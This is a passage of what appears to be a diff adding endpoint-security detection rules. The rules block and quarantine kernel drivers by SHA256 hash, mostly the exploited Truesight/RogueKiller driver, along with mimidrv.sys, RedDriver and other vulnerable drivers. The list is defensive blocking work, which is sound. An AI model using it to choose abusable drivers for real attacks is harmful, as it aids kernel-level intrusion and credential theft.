"global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.149144Z", + "creation_date": "2026-03-23T11:45:31.149146Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.149191Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "744ed029e9736a98f8e21b8e5d45e78a1cdeeeeb54701c4777099194de8eb6ab", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "953521ba-e961-5900-9202-58a0d930f06c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.823944Z", + "creation_date": "2026-03-23T11:45:31.823956Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.823965Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "158c24d677ba46f36ee7af78321cc18070518d31d39cba466f121df3025c3ec5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9535de87-b09d-5208-90ee-a4dde33c391c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.153230Z", + "creation_date": "2026-03-23T11:45:31.153233Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.153242Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c96a79153fb6a5cbcea22594e0305c1290f98d22a6205f9c5aaafd86ae3d027a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "953aea04-e443-50f6-a66d-f2ab2cf42983", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.480759Z", + "creation_date": "2026-03-23T11:45:31.480763Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.480772Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "44ec870309da8e35fc9c6cf3b82029ea780a15a6c24a95bbf498f76a1e45f0d9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9550324a-f828-5ca5-9ee7-2ad6504c354e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.816809Z", + "creation_date": "2026-03-23T11:45:31.816812Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.816819Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2e599011e68fe87619f887731f8cefff3e7f2379fdb3432b1c0806a7b2908b2a", 
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "95562fd9-1249-5a3b-8500-20568d458428", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.829673Z", + "creation_date": "2026-03-23T11:45:30.829676Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.829685Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8f7b50d590b81850bb0a84fa1314cfd8572abf90fa9b4de8b89e1e9f906df35c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "958d9671-e989-5469-93d7-355e5034fdee", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, 
+ "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.494546Z", + "creation_date": "2026-03-23T11:45:31.494548Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.494554Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fdbc03908ce11512ba109d53e8d62b27e347683ff6aaad37d48b4eda3d2dddbc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9597b55e-da1f-5527-b410-5788e431c313", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.491170Z", + "creation_date": "2026-03-23T11:45:31.491173Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.491181Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c91902a47dd1324d534da43f97802017525c0569ff43e505d98501fbee10a6ae", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "95bac36c-b45d-5b7c-9f58-023d05e26ee5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.477321Z", + "creation_date": "2026-03-23T11:45:31.477325Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.477336Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e9a210fd7d55526d329aed28aa20a32a706e9a4ae631ae314983b7dadc223265", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "95bfb187-0c64-55d0-a36f-8a40afe1e44f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150530Z", + "creation_date": 
"2026-03-23T11:45:31.150532Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150537Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "44f369c19a088e940ebcecaf4e76ceb5de2df6de99d6ec6eb42d76653e294a3c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "95c44536-5b79-5f23-a681-a8992341b5ca", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606332Z", + "creation_date": "2026-03-23T11:45:29.606334Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.606339Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "decba65bbf2232ac55a698539304cab211b45eef0ed17c05dd7995bef2b98fc6", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"95ce19ea-6093-5c3a-b8b8-6e38e5776ca0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.478633Z", + "creation_date": "2026-03-23T11:45:31.478637Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.478646Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2e867e441d3cd8f642628c2f5fe444c3530fecf8110e854705c7e69fb17361eb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "95de7c68-6302-5c3c-b3e3-c2dfae63c647", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.822406Z", + "creation_date": "2026-03-23T11:45:30.822408Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:30.822414Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "58d81ddb4104c37284b15fca0d90b4388e430a34d93823df1a3514962dbcddb5", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "95e381d1-773b-59bf-91d2-664882043a0b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.499616Z", + "creation_date": "2026-03-23T11:45:31.499619Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.499627Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8c83a6c5a958d37120860687502a434c1cca089e832e0c6722d10341518d9c2c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "95f15f28-d7eb-5afb-bf5f-8b2996e32d36", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": 
"quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820737Z", + "creation_date": "2026-03-23T11:45:30.820739Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820744Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f14da8aa5c8eea8df63cf935481d673fdf3847f5701c310abf4023f9d80ad57d", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "95fd2d2e-65c6-549a-a8a7-a0a064de87b1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810073Z", + "creation_date": "2026-03-23T11:45:31.810076Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810084Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"cd5657f459dfb4f93069a1a9ae1968836a4ef63d88236b65b9bf8a120f0c0495", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "96003a1f-dbcf-51b5-b601-ab7abdbbbbaa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.468286Z", + "creation_date": "2026-03-23T11:45:30.468290Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.468299Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2c44c0464e5b01540ba573be7555b3fcbdb65c9f1193f9c1d02b04c70090d4ac", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "96073a34-cef1-5b14-a28f-f6a4af90d790", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.490678Z", + "creation_date": "2026-03-23T11:45:31.490680Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490686Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "841d4abdf793d1e16adc215eed8b34ce477a146d1e05620abc6ddfdb0f008ba9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "961faf78-0b83-5c21-b2b2-0e4b70c773c8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.986066Z", + "creation_date": "2026-03-23T11:45:29.986068Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.986073Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7aa067d928404795b4eb9c169639f23997227504ca4eb7b5b21518e6155abd47", + "comment": "Malicious Kernel Driver related to RedDriver (aka telephonuAfY.sys, spwizimgVT.sys, 834761775.sys, reddriver.sys, 
typelibdE.sys, NlsLexicons0024UvN.sys and ktmutil7ODM.sys) [https://blog.talosintelligence.com/undocumented-reddriver/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "962039f0-3b08-52d8-89b1-9dc27e23ee4a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.452650Z", + "creation_date": "2026-03-23T11:45:30.452653Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.452661Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5d10285d802fa793c217933c907d82db58977b865b3dad3848c6ed2550022413", + "comment": "Vulnerable Kernel Driver (aka phydmaccx86.sys) [https://www.loldrivers.io/drivers/1055625b-3480-48b3-9556-8628a745d8f0/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9629d955-c807-5b7f-b621-1ba06aa31d5c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.836771Z", + "creation_date": 
"2026-03-23T11:45:30.836774Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.836779Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d98c45421981f03a80c8237c0e04d897d637f5375c9ea31b2d6720dcd1fccc5c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "962b83f0-8be0-5635-af18-0a63b0f55723", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.825575Z", + "creation_date": "2026-03-23T11:45:31.825577Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.825582Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d994c963dd4845936895346870b7d84fec03cc9d1bb495ef7a3049d386b9a1d7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ 
+ "id": "9635663a-e305-5cbc-be6d-6f9493af3e5b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980379Z", + "creation_date": "2026-03-23T11:45:29.980381Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980386Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d7b743c3f98662c955c616e0d1bb0800c9602e5b6f2385336a72623037bfd6dd", + "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "963bc974-a45c-548b-a466-228de2992b4c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.493452Z", + "creation_date": "2026-03-23T11:45:31.493454Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.493459Z", + 
"rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e74a5c67a449d84b5ab5c3556e96698f914526e7002bc52be1e59c875e2cea40", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9640599e-f57c-5160-a65c-705e2d1fc238", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155666Z", + "creation_date": "2026-03-23T11:45:31.155668Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155674Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 